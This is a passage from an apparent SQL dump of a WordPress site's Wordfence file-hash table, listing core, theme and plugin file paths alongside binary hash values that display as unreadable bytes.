��~`','�iy:��ek���(m�V~�(�{�q�_��l��X','',0,'?'),('f���*pd ��\n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dm�2�S����sh\0','\"BSC#�Q�� ߜ�O(�=��\r3\\����Y�','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('f��G�����&:q/','wp-content/themes/alpha-store/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�[/@\'�b�j','ʇ���x��s�v@�k�B����)��֭0[�Cn\n','',0,'?'),('f�-�$��G2J�d�','wp-content/themes/twentynineteen/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T)�ѣ\\soG�','��ǻ���ƕ8�	A\\ik�-Z�N���:l���','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ��	�8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('f��x�m�:g\\�E��','wp-content/themes/morfeu/languages/pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��x��]^����7ʚ','v<o�Ϟ�M~�Pn��^\nUi4�D���b','',0,'?'),('f둤s#%<XRX�@>�','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*x�&B���!�$fW','�.�7^V�t�Y��U�@Ď�\'~(�:>�k�','',0,'?'),('f�Wp��l&r:D�y�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z������ހ���5w','2�`��8�|]U��jf;�(�DM���:��q�','',0,'?'),('f��ǚ�H��.�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��vQ�\\�J�c�o','�ua^W@��>��MvV�Y1��U�$Wx7�m%�','',0,'?'),('g\n��[�q��g-	i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',0,'D�B��jP���^M','D�B��jP���^M','q{�\'*yGB/)��\"Q��j��\0ʹ�G ZJ�!�','',0,'?'),('g��6���������H','wp-content/themes/supernews/assets/img/no-image-840-480.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�\0����ڝ��@��9','$*�P�-vH��G�P�ܧ\\\'t�{f	�x2H�V','',0,'?'),('g#L�ͬK�A]ea�2','wp-content/plugins/wordpress-seo/vendor/composer/autoload_namespaces.php',0,'~�(+�K��H&G	�','~�(+�K��H&G	�',';fV՘����߳��h�V�LUi�U�̐�N','',0,'?'),('g\"�n��F��4�HY�+','wp-content/themes/mh-magazine-lite/languages/bg_BG.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2+&�w����,a��','��,>\\�E3&�Yg�5]��m-�ڒ��Z�\r#UC','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('g)�6�\\�{cݤ�','wp-content/themes/alpha-store/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^�+M�Ni/g5�','͙�<���uv��[x�\'�&��<b�6�����','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('g.���zoZ\'鲇��t�','wp-content/themes/square/inc/css/left-sidebar.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C� ��H�����˥','���<TѸ�SY;�U�#�:�;��T\"3i\n�\r','',0,'?'),('g>n����%5\'({','wp-content/plugins/wordpress-seo/admin/import/class-import-wpseo-hooks.php',0,'�􌢗�$���֢��','�􌢗�$���֢��','a���:Ψ���/����H)y�~4+�}�\0�','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('gt�.H*�W��=�C�','wp-content/themes/twentyseventeen/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p}cA���Z�8�j','�j��}�h�&��������n:R8_l���#,Y','',0,'?'),('gunRT&���Na�zwX','wp-content/themes/nirvana/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X����	#����#�','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�\\}|E?����&+B�','wp-content/themes/panoramic/library/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�F*�����_PFc\\','�<H�T��qN��0���M��g}p�d�J� �','',0,'?'),('g��?~*5�@�Ɖr�1','wp-content/themes/twentyseventeen/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Y���U���\rh�mީ','�\Zd�-��E$w��W*����Hk��/aј��o�Zi','',0,'?'),('g�9Q���h��-��J','wp-content/themes/hueman/functions/czr/tmpl/modules/widgets-areas-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���3��@\"����','�U:��f��~HX���n��\'F�(�\05�','',0,'?'),('g�;|����x�솧�','wp-content/themes/supernews/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RG8Q����ly8(','�(E��X�ZӜ;0��Sa�\\sQ��f���cv','',0,'?'),('g�t���9[���n','wp-content/plugins/wordpress-seo/frontend/class-primary-category.php',0,'E�E�P7��-Ő�{','E�E�P7��-Ő�{','6Ǿ��[���\n���ɟq�� \"�gԇ�90�','',0,'?'),('g���S�8�1��-\\�','wp-content/plugins/spam-captcha/core/lang/SL_framework-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','穑�y��\\\r��m','�������a�\n[��D�&]�g��e�\'�','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('gۻ���������','wp-content/themes/mh-magazine-lite/languages/fi.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�����&�o�a��','���\"jy-��Ȑ�ڞ�<K\Z��f#�Ķ���4','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g��ۤ�9�\Z	uA�','wp-content/themes/relia/inc/class.tgm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٺ<�Ԡ�P�z��','�JJ�\\�5;��}��+���kT�^5�s�','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('h\n�z�N:�cg�','wp-includes/block-patterns/two-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('h�#̵&�;�I�','wp-content/themes/barletta/js/dev/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-J�%�z����u�','	���(G��0�Z���qQw���`����·','',0,'?'),('h������P�x��vD','wp-content/plugins/unyson/framework/includes/option-types/slider/class-fw-option-type-short-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X2v��uyN&虃�r�','�&�(�����$7�$��l��v��a��X','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tZ��޺��,��	�','*\rL�\Zv&ejpe]�n��-VU�i\n�Bw�\'�','',0,'?'),('hd�\Z[�Ƹ\r��#&�','wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-featured-slider-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�\n�\\E�����j-�','B��������R�0[�^�i��O�j��~%Gy�','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('h-��s�#[}ᛤa��','wp-content/themes/clean-magazine/images/gallery/slider1-1920x800.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WO	�1����[�/���','�\\�ك�\\�\n`7�\\���ϴ�ǟ�7� A','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�`9�����0Y߰y','�)�ࣜ����ia	���V�4�����pIw?','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h>d9�z\r&�y�','wp-content/themes/supernews/assets/library/Font-Awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<=�]wӕ�y�}LƉ�h','ߘ�D�8��,\\�16GN��	a�͙o�f�\\8','',0,'?'),('hC�j�/Z�}%9��n�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_ServiceResource.php',0,'-�M++\r\0�Vq»N�','-�M++\r\0�Vq»N�','���c/�tU��k���U�N@��y�8�z���u�\\','',0,'?'),('hLǻ���f[��q�W','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/views/view.php',0,'�F�xDG&(l+C6�','�F�xDG&(l+C6�','�j�����<�+��uN��G�_�J�','',0,'?'),('hUL	��&YL��ۙh','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֔���ݖJ��z��','!�N���QC�$�z�(\rs<QDπ&�','',0,'?'),('hf_-(� �wL��r�4@','wp-content/themes/square/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V����2�N0�','u\Z�XQ9�Y�U97K����;GY��ֺ8�0@','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h��O �[u��_)��l','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.cat.php',0,'|<#(UK�N�\n)���~','|<#(UK�N�\n)���~','�	\rxK5��D��������T&!�x�dۋa','',0,'?'),('h��j��u�Q3A','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-mysqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʏ�t�}<5�L�','y�����=���Η͔R!|�u�긣','',0,'?'),('h��Öؚx��UH>�A','wp-content/themes/wen-business/assets/js/skip-link-focus-fix.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ْ=!�I�\'��','���sL��M�=T�f��(���Ew��.s��w�\"','',0,'?'),('h���m{u�k�vy;q','wp-content/themes/clean-magazine/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��1(�\"��v�(&K��','�~Q�g��[1T#gZ������@�qlŵ�Y�','',0,'?'),('h���ɋ����~s�t','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/export.min.rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�\0�@U+��Ի4k8a','w���6�o�o�i#w�㝺�\\j�5��+Wݺ�','',0,'?'),('h�a�#U�|-N�($c�','wp-content/themes/hueman/option-tree/includes/ot-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\/~�cP\\�Ua','P�yW�£  _�	w��T�}{��\0s�3n(\'','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h��i���T6��\"�=','wp-content/themes/supernews/languages/supernews.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cz_C)lF]{����:','><�;��-_B4\Z�Ļ��nf�ƶ;�q�,�h��','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Z�\\��;�O�','�|�.h��.��+\r	1�C\'�m��h$x(���','',0,'?'),('h��r���/�B�\'�0','wp-content/themes/twentynineteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�x��4�Ҫ���','d�@����d%�1M���Mo6��1����Vk','',0,'?'),('h��0�9�e4���D','wp-content/themes/illdy/layout/images/front-page/front-page-project-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZF\rxX�u����~�','H��Ծdy���d6#}��N%`�4��B�|','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',0,'��D_������	/���','��D_������	/���','���}>��Ș����9�{xCK.*�\0������','',0,'?'),('h��,�\n�<����V','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/class-fw-ext-backups-task-type-download.php',0,'r[��c�C�EHc\0�U','r[��c�C�EHc\0�U','��;�.,(�&�z�[��e����D�\n��','',0,'?'),('h��*ٻ=�7�G!p','wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����L��Q�4�t','\\���W4agI�#�vCݽ��I��6���Y�nF','',0,'?'),('h�.α�D4$�Gv��lC','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php',0,'ȵ����<�����','ȵ����<�����','`�s22�`��G�ܢ�\"�������}K���d���','',0,'?'),('h�}f���������H','wp-content/themes/alpha-store/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X׌��j�Oj�܈�;��','�[�r�W���ʳ>9T���X3`�imI��a	O','',0,'?'),('h�6;Ғ�c%����7','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߱�l�\Zp���\"�','�?�fD�\r��5ק�	��ߋ�ޙ���J�6�qm','',0,'?'),('h�rE�����\r:�ð','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static.php',0,'�a����3/6�����','�a����3/6�����','��^S��@�U-J���q�ŕ�y64S�f3����','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0_�! J�M��,�','����ut�UziI\nn�n�r������3�','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i\'Ih=�l�����l','wp-content/plugins/spam-captcha/lang/spam_captcha.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Kꃅ���=|BpH',' p\n�����t���J�\ZsD��u����F�o','',0,'?'),('i.x� ����ۣ\0\Z�W','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/page-builder.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'M�avD��ݘ�I�܅','����چ_�t8���nd^2�g��+��','',0,'?'),('i6Z���1��}�H�^�','wp-content/themes/tortuga/css/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�Z�2��������','(�5�\\&HFI7l24=}`�j�V����Bj4)�','',0,'?'),('i;�s�&�@�v7','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4+�?bd�]?��B��','��CD6;��%�5��Y\r�xՆ\\7ae����dR','',0,'?'),('iA�?��3nD\rx�','wp-content/themes/relia/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]#����E���[','�?�3Gb`$�\\��_�ו�7͈\nÿ\'zc�','',0,'?'),('iNs6C��&7����#I','wp-content/plugins/unyson/framework/includes/option-types/simple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	����\'�\nT��CO','��:�s�c�~��v��o��ˡq�$�澲�','',0,'?'),('iZ T�d@3Z5QQ���','wp-content/themes/travelify/templates/template-blog-medium-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N؞��_? vӃ�<2','p�����Y&tqe0����m�&9l�o���','',0,'?'),('iZ�`\n���_}琿�','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/iterator/class-ai1wm-recursive-iterator-iterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,j��z��tE�Z-�','�y5~�Ex���i���$��ʈ������jd','',0,'?'),('i\\�4W��2�4��>�','wp-content/themes/twentytwentyone/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�S�e�ۋ-/','�����I\r�ަ,�/,V�����ɩ�ӄ%','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<��܎�s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('ic\Z4\n�I^xQ�8','wp-content/themes/accelerate/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��i���r_ȾEn�O','���0�5�	��.N�[,�@�f��63u�زz�','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('iu\r�l`a��wB/�Ɗ','wp-content/themes/accelerate/fontawesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t0��,�ӘF�v���N','5�L�@^�-����!��>�Q��=��⒒��','',0,'?'),('i��q����xjpR��','wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����{�κ','�F�\"�ט�VX����R�H�^�v,\"o��','',0,'?'),('i��`�����O��$@','wp-content/themes/clean-magazine/languages/de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�ȅQ7\\���<�;+�','[J�2Ѳ_��\n�=�f[�[P�Ğr�Zzi�)�#@','',0,'?'),('i�@��7B]�]��0�','wp-content/themes/tortuga/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܕ���M�緃Z^!','aQ:V�����U�x?S� Vf���ޒK-gj�','',0,'?'),('i�����ߠ����','wp-content/themes/relia/inc/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KZ����H^P:���','���f�N�h�~�\r}A�|IC�wE��','',0,'?'),('i�\08�� Gp!�5r�r','wp-content/themes/nirvana/fonts/ubuntu-l-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���LA>�Yƨ5`��',')����Ȇ���z%*�M]��_�,�����χ','',0,'?'),('i�T���g�W�P','wp-content/plugins/wordpress-seo/admin/class-import-external.php',0,'y4t�F�.��t[�1a\'','y4t�F�.��t[�1a\'','�_ǃ�Wț��tJ���S��O�Pt\'�\r8�W�\'','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Z(���S<�	��4?�','�	Pȵkf�H��i�p�S��<�Nv��Bl��','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�I��Y�:�','�������Ć�r@��\"(r^Oe$ۜ)����','',0,'?'),('iȏڇ o��K�7p.v','wp-content/themes/fabulous-fluid/images/slider-img1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���?��l�!�','7uU����(-�[*�߿�_��%��2�b��','',0,'?'),('iϓ�j��#��Z*�','wp-content/themes/lightly/footer.php',0,'�ݦ^6i���;��p','�ݦ^6i���;��p','4��u�A#~jO�iq�y&��$ON�!z��Y�Q','',0,'?'),('i�l�r~eR)�늬�T','wp-content/themes/clean-magazine/images/gallery/ads-300x250.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��+_js%0s�Ó','}��u�4=L��<L��wM*��SZ1%��D\\u�','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i��� e)�z���s�','wp-content/themes/travelify/languages/pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� 2��|5���2�AH','Њ}�2���A!�x��`%Og�d��i����a�','',0,'?'),('i�dQ��V�}+O�l�','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/components/full/class-fw-ext-builder-templates-component-full.php',0,'?�q�������`@','?�q�������`@','�/<�57�ؖU��c�-)s��#�h\0��5�p�','',0,'?'),('j��c���x����','wp-content/themes/precious-lite/sidebar-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s^��+,E\Z?(Y$l','(*�N���\Z�ͺd_0��1��\\��d�����','',0,'?'),('j%���B$XH���','wp-content/plugins/spam-captcha/lang/spam_captcha-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��J2�xn�����','�\"A��\\�^�/��텩��q���/NCr��','',0,'?'),('j�ڳ�\n�o�#�>�','wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'r2U�������X','3u�2;Wm��j��ۻ����\"\0!4���h0l:','',0,'?'),('j�L�z�=�%��Y��','wp-content/themes/clean-magazine/js/clean-magazine-scrollup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��V��$�ҡh�oD\\','���P{-sH^͓�t����o�ߔ,�#�|���','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j9�����/� �k','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/css/datepicker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�^��z�C%4�','#�M�a�ZD�9��Q�H��-�?��S/��H�[�','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ψ��+���F��','�y�ٰ���e��k�c���&�ad���\Z0\Z5','',0,'?'),('j`�>P�S�E�՛Z/','wp-content/themes/hueman/languages/es_VE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��@����MG!','�ײĄ>A�E?C���9B_�>!������','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����v�C/�O��','���9��ǐ{<����ء��\\K��B{��\\�Ԏ','',0,'?'),('jt��Z��ܿ�,��','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����a�a��i','{J�L���ͻ&��{��{��T:������B','',0,'?'),('jv�[��\0l�Zh��A�','wp-content/plugins/spam-captcha/core/include/tokenize/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7a�USF�B�h�','A��D]j���g�j�sw�_��j�E��\nH��','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d~�6����L��','H�m���n5\0��c��~��(<-��G7ÿ�P�n�','',0,'?'),('j�_m�EQ�,��k�','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~N��{M5�D���','R������{��X�g��ɍ�1T~���=','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�v��\\W�%A�E6$�','���G0n�eiLՀ�P���}�9� 